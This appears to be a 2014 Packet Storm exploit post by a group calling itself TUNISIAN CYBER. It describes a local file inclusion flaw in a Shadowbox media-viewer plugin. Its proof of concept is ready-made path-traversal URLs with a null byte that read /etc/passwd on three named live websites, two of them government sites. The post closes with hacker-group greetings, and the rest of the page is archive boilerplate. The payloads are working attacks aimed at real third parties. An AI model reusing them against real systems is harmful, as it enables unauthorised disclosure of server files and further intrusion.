seeing is believing

Shadowbox Local File Inclusion

Shadowbox Local File Inclusion
Posted Feb 3, 2014
Authored by TUNISIAN CYBER

Shadowbox media view suffers from a local file inclusion vulnerability. Note that this finding houses site-specific data.

tags | exploit, local, file inclusion
MD5 | b7525dcd4810b4dbdd58c41a92c2ddfd

Shadowbox Local File Inclusion

Change Mirror Download
[+] Author: TUNISIAN CYBER
[+] Exploit Title: Shadowbox LFI Vulnerability
[+] Date: 03-02-2014
[+] Category: WebApp
[+] Google Dork: :
[+] Tested on: KaliLinux
[+] Vendor: http://shadowbox-js.com/
[+] Friendly Sites: na3il.com,th3-creative.com
###############################################################
+Description:
Shadowbox is a web-based media viewer application that supports all of the web's most popular media publishing formats.
Shadowbox is written entirely in JavaScript and CSS and is highly customizable.
Using Shadowbox, website authors can showcase a wide assortment of media in all major browsers without navigating users away from the linking page.
+Exploit:
Shadowbox suffers from a LFI vulnerability

+PoC:(Tested on Demo)
http://www.comunidadedaesperanca.com.br/plugins/system/shadowbox/min/index.php?g=sb&ad=base&lan=en&play=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd%00
http://www.hospitalcastro.gov.cl/plugins/system/shadowbox/min/index.php?g=sb&ad=base&lan=en&play=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd%00
http://www.statehouse.gov.sl/plugins/system/shadowbox/min/index.php?g=sb&ad=base&lan=en&play=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd%00

PS: Scroll Down to see result
########################################################################################
Greets to: XMaX-tn, N43il HacK3r, XtechSEt
Sec4Ever Members:
DamaneDz
UzunDz
GEOIX
########################################################################################

Comments

RSS Feed Subscribe to this comment feed

No comments yet, be the first!

Login or Register to post a comment

File Archive:

July 2017

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Jul 1st
    2 Files
  • 2
    Jul 2nd
    3 Files
  • 3
    Jul 3rd
    15 Files
  • 4
    Jul 4th
    4 Files
  • 5
    Jul 5th
    15 Files
  • 6
    Jul 6th
    15 Files
  • 7
    Jul 7th
    10 Files
  • 8
    Jul 8th
    2 Files
  • 9
    Jul 9th
    10 Files
  • 10
    Jul 10th
    15 Files
  • 11
    Jul 11th
    15 Files
  • 12
    Jul 12th
    19 Files
  • 13
    Jul 13th
    16 Files
  • 14
    Jul 14th
    15 Files
  • 15
    Jul 15th
    3 Files
  • 16
    Jul 16th
    2 Files
  • 17
    Jul 17th
    8 Files
  • 18
    Jul 18th
    11 Files
  • 19
    Jul 19th
    15 Files
  • 20
    Jul 20th
    15 Files
  • 21
    Jul 21st
    15 Files
  • 22
    Jul 22nd
    7 Files
  • 23
    Jul 23rd
    0 Files
  • 24
    Jul 24th
    0 Files
  • 25
    Jul 25th
    0 Files
  • 26
    Jul 26th
    0 Files
  • 27
    Jul 27th
    0 Files
  • 28
    Jul 28th
    0 Files
  • 29
    Jul 29th
    0 Files
  • 30
    Jul 30th
    0 Files
  • 31
    Jul 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2016 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close